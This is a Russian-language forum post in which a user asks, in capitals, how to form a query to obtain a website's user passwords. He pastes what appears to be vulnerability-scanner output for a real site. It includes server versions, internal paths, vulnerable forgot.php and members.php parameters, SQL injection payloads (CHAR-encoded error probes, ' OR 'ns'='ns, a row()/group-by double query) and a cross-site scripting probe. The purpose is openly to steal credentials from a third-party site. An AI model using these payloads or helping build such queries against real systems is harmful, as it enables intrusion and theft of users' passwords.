slawyanin
Сообщений: 8
Оценки: 0
Присоединился: 2011-11-14 16:01:17.530000
|
ПОМОГИТЕ ПРАВИЛЬНО СФОРМИРОВАТЬ ЗАПРОС ЧТОБЫ УЗНАТЬ ПАССЫ ЮЗВЕРОВ ВОТ ИНФА О САЙТЕ Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Extracted Version: X-Powered-By: PHP/5.2.14 Vulnerable URL : http://www.ccылкунедам.com/forgot.php Parameter Name: Email <========== Parameter Type: Post <========== Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' Vulnerable URL : http://www.ccылкунедам.com/forgot.php Identified Internal Path(s): /home/tnburns/public_html/ccылкунедам.com/forgot.php Parameter Name: Email <================== Parameter Type: Post Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' Vulnerable URL : http://www.ccылкунедам.com/forgot.php Parameter Name: Email <========= Parameter Type: Post Attack Pattern: '%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B' Vulnerable URL : http://www.ccылкунедам.com/forgot.php Parameter Name: Email <———- Parameter Type: Post <——— Attack Pattern: ' OR 'ns'='ns <— Vulnerable URL : http://www.ccылкунедам.com/members.php Identified Field Name: password <—- Vulnerable URL : http://www.ccылкунедам.com/members.php Form target action: members.php <—– Vulnerable URL : http://www.ccылкунедам.com/members.php Identified Internal Path(s): /home/tnburns/public_html/ccылкунедам.com/members.php Parameter Name: id <—– Parameter Type: Post <—– Attack Pattern: 1%27+or+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)–+1 Vulnerable URL : http://www.ccылкунедам.com/ Identified Cookie: PHPSESSID Vulnerable URL : http://www.ccылкунедам.com/Scripts/'"–><script>netsparker(0x00003B)</script> Parameter Name: URI-BASED <—– Parameter Type: RawUrlInjection <====== Attack Pattern: '"–><script>netsparker(0x00003B)</script> НА ПРИМЕРЕ ЭТОЙ ССЫЛКИ: http://www.site.com/forgot.php?Email=default
|